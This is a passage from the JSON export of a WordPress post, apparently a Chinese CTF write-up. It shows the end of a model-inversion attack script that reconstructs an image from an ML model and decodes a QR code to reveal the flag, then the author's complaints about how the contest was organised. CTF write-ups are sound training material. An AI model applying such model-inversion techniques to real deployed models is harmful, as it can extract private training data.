    opt.zero_grad()
    loss.backward()
    opt.step()

img = (torch.sigmoid(z).detach()[0, 0] * 255).byte().numpy()
Image.fromarray(img, mode='L').save('recon.png')

img = cv2.imread('recon.png')
img = cv2.resize(img, None, fx=8, fy=8, interpolation=cv2.INTER_NEAREST)
print(cv2.QRCodeDetector().detectAndDecode(img)[0])

<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u626b\u63cf\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{Simplified_MI_Attack}<\/code><\/pre>\n\n\n\n
\u603b\u7ed3<\/h1>\n\n\n\n
\u8fd9\u4e2a\u6bd4\u8d5b\u96be\u8bc4\uff0c\u7406\u8bba\u9898\u662f\u76f4\u63a5\u6ca1\u6709\u4e86, \u6211\u662f\u505a\u4e8630\u51e0\u9898\u76ee\u76f4\u63a5\u5c31\u6ca1\u6709\u4e86\uff0c\u540e\u95e8\u76f4\u63a5\u5c31\u5ba3\u5e03\u7406\u8bba\u9898\u4e0d\u8ba1\u5165\u6210\u7ee9\uff0c\u800c\u4e1418:00\u6bd4\u5b8c\u8d5b18:20\u4ea4wp\uff0c\u989d\uff0c\u5f88\u65e0\u8bed\uff0c\u800c\u4e14\u5bb9\u5668\u9898\u76ee\u53ea\u8981\u7b54\u5bf9\u5c31\u65e0\u6cd5\u5728\u5f00\u542f\uff0c\u6240\u4ee5\u4f60\u9700\u8981\u8fb9\u505awp\u8fb9\u505a\u9898\u76ee\uff0c\u4f53\u9a8c\u611f\u975e\u5e38\u4e0d\u597d\uff0c\u7b2c\u4e00\u6b21\u6bd4\u8d5b\u6240\u4ee5\u975e\u5e38\u591a\u4eba\u90fd\u8fdb\u4e0d\u53bb\uff0c\u540e\u9762\u5c31\u5ef6\u671f\u4e86\uff0c\u7b2c\u4e00\u6b21\u6bd4\u8d5b\u7684\u4eba\u633a\u591a\u7684\uff0c\u4f30\u8ba1\u6709\u4e03\u516b\u767e\u4eba\u7ed3\u679c\u51fa\u6765\u8fd9\uff0c\u6240\u4ee5\u7b2c\u4e8c\u6b21\u6bd4\u8d5b\uff0c\u4eba\u6570\u975e\u5e38\u5c11\uff0c\u9ad8\u6821+\u793e\u4f1a\u8d5b\u9053\u4f30\u8ba1\u5c31\u5feb300\u4eba\u5de6\u53f3\uff0c\u9898\u76ee\u96be\u5ea6\uff0c\u4e0d\u96be\uff0c\u51fa\u7684\u9898\u76ee\u975e\u5e38\u559c\u6b22flag\u5206\u6210\u597d\u591a\u6bb5\u3002\u770b\u8fd9\u4e2a\u4e5f\u662f\u7b2c\u4e00\u5c4a\uff0c\u5c31\u4e0d\u591a\u8bf4\u4ec0\u4e48\u4e86<\/p>\n","protected":false},"excerpt":{"rendered":"
\u524d\u8a00 \u961f\u4f0d\u540d\u5b57–\u5c0f\u6708 \u9ad8\u6821\u8d5b\u9053-\u6392\u540d:4 \u89e3\u51fa23\u9053\u9898\u76ee \u4e00\u517125\u9053 Pwn Canary\uff01 \u6808\u6ea2 […]<\/p>\n","protected":false},"author":1,"featured_media":3726,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[30],"tags":[],"class_list":["post-3594","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-30"],"_links":{"self":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/3594","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3594"}],"version-history":[{"count":3,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/3594\/revisions"}],"predecessor-version":[{"id":3727,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/posts\/3594\/revisions\/3727"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=\/wp\/v2\/media\/3726"}],"wp:attachment":[{"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3594"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3594"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjiuctf.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3594"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}